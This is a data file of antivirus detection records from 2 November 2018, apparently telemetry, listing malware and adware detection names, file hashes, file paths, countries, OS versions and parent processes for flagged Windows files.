  Row(detection=Row(filename='bulk+image+downloader+532+crack.exe', filepath='E:\\BULK+IMAGE+DOWNLOADER+532+CRACK.EXE', filesize=2560000, name='TR/Crypt.XPACK.Gen2.#M300.#R100322'), hash='8311771003a82e687eb45681c7943c563e65b03c7901745b595b9780823022d1', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2501368, timestamp='2018-11-02T08:09:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='831357cae8125c0d975200a1db8ab2ced920647d156c8027aab2d4e8d3c33411', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-29\\831357CAE8125C0D975200A1DB8AB2CED920647D156C8027AAB2D4E8D3C33411', filesize=2176000, name='HEUR/AGEN.1034483.#M1.#R1'), hash='831357cae8125c0d975200a1db8ab2ced920647d156c8027aab2d4e8d3c33411', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:27:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qtwad.exe.vir', filepath='\\\\?\\C:\\AdwCleaner\\Quarantine\\C\\Users\\cpe\\AppData\\Local\\qtwad.exe.vir', filesize=3072000, name='HEUR/AGEN.1001693.#M1.#R1'), hash='8322ebefcb18b2ce8acd383f84dfb70db5b5104864443a1146ba4958ff5ecb05', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:13:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='usbwriteprotector.exe', filepath='E:\\HBCD\\Programs\\USBWriteProtector.exe', filesize=64000, name='TR/Agent.64000.117.#M1.#R1'), hash='832eb4a864185bf214144732067e7aeb1b157e4016f2acd118fd9246385742b8', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T07:21:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221442-57fe9957', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221342-4F0362B5\\AVSCAN-20181102-221442-57FE9957', filesize=64000, name='TR/Agent.64000.117.#M1.#R1'), hash='832eb4a864185bf214144732067e7aeb1b157e4016f2acd118fd9246385742b8', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:14:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221430-562d3588', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221342-4F0362B5\\AVSCAN-20181102-221430-562D3588', filesize=64000, name='TR/Agent.64000.117.#M1.#R1'), hash='832eb4a864185bf214144732067e7aeb1b157e4016f2acd118fd9246385742b8', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:14:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-101920-99537017', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d3db38b\\AVSCAN-20181102-101904-971CB8F7\\AVSCAN-20181102-101920-99537017', filesize=64000, name='TR/Agent.64000.117.#M1.#R1'), hash='832eb4a864185bf214144732067e7aeb1b157e4016f2acd118fd9246385742b8', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:19:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-083225-beaf6548', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-082729-98D810FE\\AVSCAN-20181102-083225-BEAF6548', filesize=64000, name='TR/Agent.64000.117.#M1.#R1'), hash='832eb4a864185bf214144732067e7aeb1b157e4016f2acd118fd9246385742b8', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:32:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='usbwriteprotector.exe', filepath='H:\\HBCD\\Programs\\USBWRITEPROTECTOR.EXE', filesize=64000, name='TR/Agent.64000.117.#M1.#R1'), hash='832eb4a864185bf214144732067e7aeb1b157e4016f2acd118fd9246385742b8', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T22:11:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221553-62c936c1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221342-4F0362B5\\AVSCAN-20181102-221553-62C936C1', filesize=64000, name='TR/Agent.64000.117.#M1.#R1'), hash='832eb4a864185bf214144732067e7aeb1b157e4016f2acd118fd9246385742b8', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:15:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221513-5cb40886', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221427-55CFC5F3\\AVSCAN-20181102-221513-5CB40886', filesize=64000, name='TR/Agent.64000.117.#M1.#R1'), hash='832eb4a864185bf214144732067e7aeb1b157e4016f2acd118fd9246385742b8', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:15:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='usbwriteprotector.exe', filepath="D:\\2016\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\USBWriteProtector.exe", filesize=64000, name='TR/Agent.64000.117.#M1.#R1'), hash='832eb4a864185bf214144732067e7aeb1b157e4016f2acd118fd9246385742b8', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T03:17:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221620-66e41384', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221342-4F0362B5\\AVSCAN-20181102-221620-66E41384', filesize=64000, name='TR/Agent.64000.117.#M1.#R1'), hash='832eb4a864185bf214144732067e7aeb1b157e4016f2acd118fd9246385742b8', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:16:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221605-6484f44d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221342-4F0362B5\\AVSCAN-20181102-221605-6484F44D', filesize=64000, name='TR/Agent.64000.117.#M1.#R1'), hash='832eb4a864185bf214144732067e7aeb1b157e4016f2acd118fd9246385742b8', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:16:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-222057-90a95124', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221829-7A5CEC69\\AVSCAN-20181102-222057-90A95124', filesize=64000, name='TR/Agent.64000.117.#M1.#R1'), hash='832eb4a864185bf214144732067e7aeb1b157e4016f2acd118fd9246385742b8', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:20:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='seal angelicos.exe', filepath='\\\\?\\D:\\game\\SealAngelicos  Online\\SealAngelicos  Online\\Seal Angelicos.EXE', filesize=1664000, name='SPR/RedCap.836e12.#M1.#R1'), hash='836e12c832625d099782f2771993bf9f6c3b64aebcbb97ac65fc6f0107d370d1', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:14:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='installs.exe', filepath='E:\\sw2014x64bit\\SolidWorks Flow Simulation\\License\\Flexlm\\installs.exe', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='839c19149a37cc63e62db446f80313ca033a58ea062366e999f10769d1aa99b8', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:XxL4llJpZ0C2fM+8.1', country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T04:27:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='clydemosaic.dll', filepath='C:\\CSC e-Governance Services India Limited\\digipay\\ClydeMosaic.dll', filesize=1088000, name='W32/Ramnit.CD.#M1.#R1'), hash='83b6ef7aca927b82aa241e9a929c8a5eec13fc89b27a16e05e0a7888a1b419bd', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T09:33:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='libeay32.dll', filepath='f:\\crazykart\\crazykart\\libeay32.dll', filesize=1024000, name='W32/Ramnit.C.#M1.#R1'), hash='83ffe90ba855aecdf5bfc2f21b2708fedd9bde7ea94f8ce25d6cf6abb563c12c', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:26:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='libeay32.dll', filepath='e:\\crazykart\\libeay32.dll', filesize=1024000, name='W32/Ramnit.C.#M1.#R1'), hash='83ffe90ba855aecdf5bfc2f21b2708fedd9bde7ea94f8ce25d6cf6abb563c12c', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:06:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='libeay32.dll', filepath='e:\\new folder\\crazykart\\libeay32.dll', filesize=1024000, name='W32/Ramnit.C.#M1.#R1'), hash='83ffe90ba855aecdf5bfc2f21b2708fedd9bde7ea94f8ce25d6cf6abb563c12c', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:41:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maxiget.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\TMP\\MaxiGet.exe', filesize=636000, name='TR/Agent.636000.#M1.#R1'), hash='842272f756ee756fac0ae3d2ff9fcad19b6891feaa61e8ddd0f09f2156c403c4', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T15:52:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maxiget.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\TMP\\MaxiGet.exe', filesize=636000, name='TR/Agent.636000.#M1.#R1'), hash='842272f756ee756fac0ae3d2ff9fcad19b6891feaa61e8ddd0f09f2156c403c4', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T01:45:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maxiget.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\TMP\\MaxiGet.exe', filesize=636000, name='TR/Agent.636000.#M1.#R1'), hash='842272f756ee756fac0ae3d2ff9fcad19b6891feaa61e8ddd0f09f2156c403c4', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T14:57:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00006d1f', filepath='C:\\WINDOWS\\Temp\\bae994b3-6347-4072-9a99-ed1083c9947c\\tmp0000018d\\tmp00006d1f', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='8460c459ddd42fe462f0da14f356f3ce609a5dfdcef29944cc0f39ff2a917462', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T16:15:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00026fff', filepath='C:\\Windows\\Temp\\96471c11-35d4-4dc9-ad1d-2aa0b87bc74b\\tmp000002e4\\tmp00026fff', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='8468c3203db279591d6f3ca70d715214b3a8402c2e75c2b8753a53e0fdbd65a0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T15:09:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00658daf', filepath='C:\\Windows\\Temp\\96471c11-35d4-4dc9-ad1d-2aa0b87bc74b\\tmp000002e4\\tmp00658daf', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='8468c3203db279591d6f3ca70d715214b3a8402c2e75c2b8753a53e0fdbd65a0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T15:45:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='smartbar.communication.dll.vir', filepath='C:\\AdwCleaner\\Quarantine\\C\\Program Files (x86)\\LPT\\Smartbar.Communication.dll.vir', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='8468c3203db279591d6f3ca70d715214b3a8402c2e75c2b8753a53e0fdbd65a0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T15:09:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00658e46', filepath='C:\\Windows\\Temp\\96471c11-35d4-4dc9-ad1d-2aa0b87bc74b\\tmp000002e4\\tmp00658e46', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='8468c3203db279591d6f3ca70d715214b3a8402c2e75c2b8753a53e0fdbd65a0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T15:45:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00658b6a', filepath='C:\\Windows\\Temp\\96471c11-35d4-4dc9-ad1d-2aa0b87bc74b\\tmp000002e4\\tmp00658b6a', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='8468c3203db279591d6f3ca70d715214b3a8402c2e75c2b8753a53e0fdbd65a0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T15:45:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00026f85', filepath='C:\\Windows\\Temp\\96471c11-35d4-4dc9-ad1d-2aa0b87bc74b\\tmp000002e4\\tmp00026f85', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='8468c3203db279591d6f3ca70d715214b3a8402c2e75c2b8753a53e0fdbd65a0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T15:09:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00658a40', filepath='C:\\Windows\\Temp\\96471c11-35d4-4dc9-ad1d-2aa0b87bc74b\\tmp000002e4\\tmp00658a40', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='8468c3203db279591d6f3ca70d715214b3a8402c2e75c2b8753a53e0fdbd65a0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T15:45:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00658c2f', filepath='C:\\Windows\\Temp\\96471c11-35d4-4dc9-ad1d-2aa0b87bc74b\\tmp000002e4\\tmp00658c2f', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='8468c3203db279591d6f3ca70d715214b3a8402c2e75c2b8753a53e0fdbd65a0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T15:45:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-100233-33710064', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d15e3e13\\AVSCAN-20181102-094231-829B20AD\\AVSCAN-20181102-100233-33710064', filesize=20000, name='PUA/Linkury.#M1.#R1'), hash='8468c3203db279591d6f3ca70d715214b3a8402c2e75c2b8753a53e0fdbd65a0', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:02:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0059d02a', filepath='C:\\Windows\\Temp\\96471c11-35d4-4dc9-ad1d-2aa0b87bc74b\\tmp000002e4\\tmp0059d02a', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='8468c3203db279591d6f3ca70d715214b3a8402c2e75c2b8753a53e0fdbd65a0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T15:22:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-152313-4171afde', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d15e3e13\\AVSCAN-20181102-094231-829B20AD\\AVSCAN-20181102-152313-4171AFDE', filesize=20000, name='PUA/Linkury.#M1.#R1'), hash='8468c3203db279591d6f3ca70d715214b3a8402c2e75c2b8753a53e0fdbd65a0', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:23:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-095030-c91c21be', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d15e3e13\\AVSCAN-20181102-094231-829B20AD\\AVSCAN-20181102-095030-C91C21BE', filesize=20000, name='PUA/Linkury.#M1.#R1'), hash='8468c3203db279591d6f3ca70d715214b3a8402c2e75c2b8753a53e0fdbd65a0', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:50:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-101232-8b9da606', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d15e3e13\\AVSCAN-20181102-094231-829B20AD\\AVSCAN-20181102-101232-8B9DA606', filesize=20000, name='PUA/Linkury.#M1.#R1'), hash='8468c3203db279591d6f3ca70d715214b3a8402c2e75c2b8753a53e0fdbd65a0', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:12:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp000feab9', filepath='C:\\Windows\\Temp\\96471c11-35d4-4dc9-ad1d-2aa0b87bc74b\\tmp000002e4\\tmp000feab9', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='8468c3203db279591d6f3ca70d715214b3a8402c2e75c2b8753a53e0fdbd65a0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T15:12:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp000fe229', filepath='C:\\Windows\\Temp\\96471c11-35d4-4dc9-ad1d-2aa0b87bc74b\\tmp000002e4\\tmp000fe229', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='8468c3203db279591d6f3ca70d715214b3a8402c2e75c2b8753a53e0fdbd65a0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T15:12:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp000ff6a5', filepath='C:\\Windows\\Temp\\96471c11-35d4-4dc9-ad1d-2aa0b87bc74b\\tmp000002e4\\tmp000ff6a5', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='8468c3203db279591d6f3ca70d715214b3a8402c2e75c2b8753a53e0fdbd65a0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T15:12:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp000fe0d7', filepath='C:\\Windows\\Temp\\96471c11-35d4-4dc9-ad1d-2aa0b87bc74b\\tmp000002e4\\tmp000fe0d7', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='8468c3203db279591d6f3ca70d715214b3a8402c2e75c2b8753a53e0fdbd65a0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T15:12:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp006592b8', filepath='C:\\Windows\\Temp\\96471c11-35d4-4dc9-ad1d-2aa0b87bc74b\\tmp000002e4\\tmp006592b8', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='8468c3203db279591d6f3ca70d715214b3a8402c2e75c2b8753a53e0fdbd65a0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T15:46:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='849de1ef7edbc9a0ed76edae5afe1f0d4ee61b9980094f9b51441f7249f83ef2.mrg', filepath='D:\\TotalAutomation\\CategorizationLayer\\21.11.2017-393.available\\Avira\\Others\\PE-detected-Avira\\HEUR.AGEN.1032585\\849de1ef7edbc9a0ed76edae5afe1f0d4ee61b9980094f9b51441f7249f83ef2.MRG', filesize=704000, name='HEUR/AGEN.1032585.#M1.#R1'), hash='849de1ef7edbc9a0ed76edae5afe1f0d4ee61b9980094f9b51441f7249f83ef2', metadata=Row(cmdline='D:\\\\\\\\TotalAutomation\\\\\\\\CategorizationLayer\\\\\\\\21.12.2017-141.available\\\\\\\\Avira\\\\\\\\Others\\\\\\\\PE-detected-Avira -PERHASH', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\TotalAutomation\\Dependencies\\Buf\\WWPERHASH.exe', parentsize=1842176, timestamp='2018-11-02T16:03:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-013246-bb1bb6aa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-013241-BA30844D\\AVSCAN-20181102-013246-BB1BB6AA', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T00:32:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp_tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Recovery\\tmp_tmp', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T11:38:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='\\\\?\\D:\\Desktop\\nano\\1\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:49:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-004724-9a08a740', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e0de1845\\AVSCAN-20181103-004631-8E72A937\\AVSCAN-20181103-004724-9A08A740', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T16:45:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='\\\\?\\e:\\0.3.4b\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:02:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-105607-6a2cdd95', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a4a2b196\\AVSCAN-20181102-105058-296886CB\\AVSCAN-20181102-105607-6A2CDD95', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-113251-ee6e0a95', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1319955c\\AVSCAN-20181102-113016-D8D36EE0\\AVSCAN-20181102-113251-EE6E0A95', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='BN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T03:32:53Z'), dt=datetime.date(2018, 11, 2)),
